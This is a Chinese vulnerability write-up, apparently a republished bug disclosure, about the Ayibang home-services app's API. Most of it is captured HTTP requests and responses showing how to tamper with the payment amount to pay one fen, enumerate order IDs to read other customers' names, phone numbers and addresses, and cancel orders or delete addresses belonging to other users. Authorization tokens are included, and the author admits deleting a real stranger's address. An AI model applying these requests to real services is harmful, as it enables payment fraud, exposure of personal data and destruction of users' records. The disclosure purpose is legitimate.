【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除

漏洞细节

1、超低价格支付订单
点击首页,随便选择一项服务并下订单

【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除_第1张图片

【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除_第2张图片

点击确认支付抓包并先截断提交:

POST https://api-cust.ayibang.com/v1/pay/wx/sign HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 30f6188161eb1a0bc7d245c49c01a208bb3cee34
Network: WiFi
City: beijing
Timestamp: 1452845167007
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 128
out_trade_no=11291191&attach=0_1_13800000000_0&body=%E9%98%BF%E5%A7%A8%E5%B8%AE%E6%94%AF%E4%BB%98&total_fee=5000&trade_type=APP&

将上面的total_fee的值改为1,提交

【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除_第3张图片


支付成功后订单成为待确认状态,说明支付成功

【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除_第4张图片

2、任意用户订单查看
点击我们刚生成的订单,系统访问如下地址:

GET https://api-cust.ayibang.com/v1/order/detail?orderID=11291191 HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 30f6188161eb1a0bc7d245c49c01a208bb3cee34
Network: WiFi
City: beijing
Timestamp: 1452845324989
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip

orderID=11291191处可遍历,burp出手对订单的后四位遍历

【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除_第5张图片

N多订单信息可看

【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除_第6张图片

以订单ID为11290071为例,可查看到该订单涉及用户的姓名 手机号 住址等

【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除_第7张图片

3、任意用户订单取消漏洞
点击之前的订单,点击取消订单,系统访问如下url:

POST https://api-cust.ayibang.com/v1/order/cancel HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 30f6188161eb1a0bc7d245c49c01a208bb3cee34
Network: WiFi
City: beijing
Timestamp: 1452846770206
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 42
data=%7B%22orderID%22%3A%2211291191%22%7D&

post处内容url解码后为:{"orderID":"11291191"}
通过遍历orderID可删除所有订单
通过另一手机注册一个账号并下一个订单

【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除_第8张图片

抓包查得该订单ID为11292401
提交以下代码:

POST https://api-cust.ayibang.com/v1/order/cancel HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 30f6188161eb1a0bc7d245c49c01a208bb3cee34
Network: WiFi
City: beijing
Timestamp: 1452846770206
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 42
data=%7B%22orderID%22%3A%2211292401%22%7D&

成功取消该订单

【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除_第9张图片

再查看该用户订单列表,已经成为空:

【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除_第10张图片

4、任意用户服务地址删除
点击app里面服务地址:

【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除_第11张图片

添加两个地址:

【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除_第12张图片

然后删除上面的两个地址,并抓包:
删除第一个地址请求数据包如下:

GET https://api-cust.ayibang.com/v1/house/delete?houseID=17334752 HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 211ebac721824b5cb688e3c6d1187bc21beff557
Network: WiFi
City: nanjing
Timestamp: 1452841496773
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip

返回数据包如下:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Jan 2016 07:04:57 GMT
Content-Type: application/json
Connection: close
X-Powered-By: PHP/5.6.11
Content-Length: 628
{"house":{"id":"17334752","custID":"16989352","city":"nanjing","cityName":"\u5357\u4eac","zone":"null","nameAddr":"\u5b9e\u9a8c\u6d4b\u8bd5\u4e2d\u5fc3","svcAddr":"\u6c5f\u82cf\u7701\u5357\u4eac\u5e02\u4e2d\u5c71\u4e1c\u8def534\u53f7","detailAddr":"\u6d4b\u8bd5\u5730\u5740","sqmeter":0,"status":-1,"bedroom":0,"livingroom":0,"kitchen":0,"bathroom":0,"remark":"","comment":"","defaultaddr":1,"oid":"0","type":"1","locationAddr":"\u5b9e\u9a8c\u6d4b\u8bd5\u4e2d\u5fc3\u6d4b\u8bd5\u5730\u5740","addr":"\u5357\u4eac\u5b9e\u9a8c\u6d4b\u8bd5\u4e2d\u5fc3\u6d4b\u8bd5\u5730\u5740","statusName":"\u5df2\u5220\u9664","durationSuggest":2}}

上面内容解码后如下:

【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除_第13张图片

可以看到statusName处标记为已删除,并且数据包返回的ID与删除的ID为同一ID:17334752
再删除另外一个地址:

GET https://api-cust.ayibang.com/v1/house/delete?houseID=17336562 HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 211ebac721824b5cb688e3c6d1187bc21beff557
Network: WiFi
City: nanjing
Timestamp: 1452841783577
Host: api-cust.ayibang.com
Connection: Keep-Alive
Accept-Encoding: gzip

由此可看到系统删除服务地址是根据不同的ID来实现的,虽然数字不是连续的,但是经过几次尝试发现都是以17开头的8位数字,如此遍可以通过遍历id删除其它用户的服务地址
只需提交以下数据包:

GET https://api-cust.ayibang.com/v1/house/delete?houseID=17336562 HTTP/1.1
User-Agent: {"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":"6.2.0","device":"M355","sim-Operator":"UnKnown","mac":"28D2446FF003","type":"Android","channel":"portal"}
Authorization: 211ebac721824b5cb688e3c6d1187bc21beff557

通过burpsuite 遍历houseID处,即可删除所有用户收获地址
以下为我随便找的一个用户地址(抱歉给这位用户带来困扰):

GET https://api-cust.ayibang.com/v1/house/delete?houseID=17330512 HTTP/1.1
Host: api-cust.ayibang.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 OPR/34.0.2036.47
DNT: 1
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: zh-CN,zh;q=0.8

返回:

【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除_第14张图片

如果需要通过浏览器复现上面问题,需要注意数据请求处有一个请求头:
Authorization: 211ebac721824b5cb688e3c6d1187bc21beff557
此处的authorization是用户在登录APP的时候服务器返回的认证key

【漏洞学习——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除_第15张图片

参见:https://bugs.shuimugan.com/bug/view?bug_no=174347

 

你可能感兴趣的:(【渗透测试实战1】)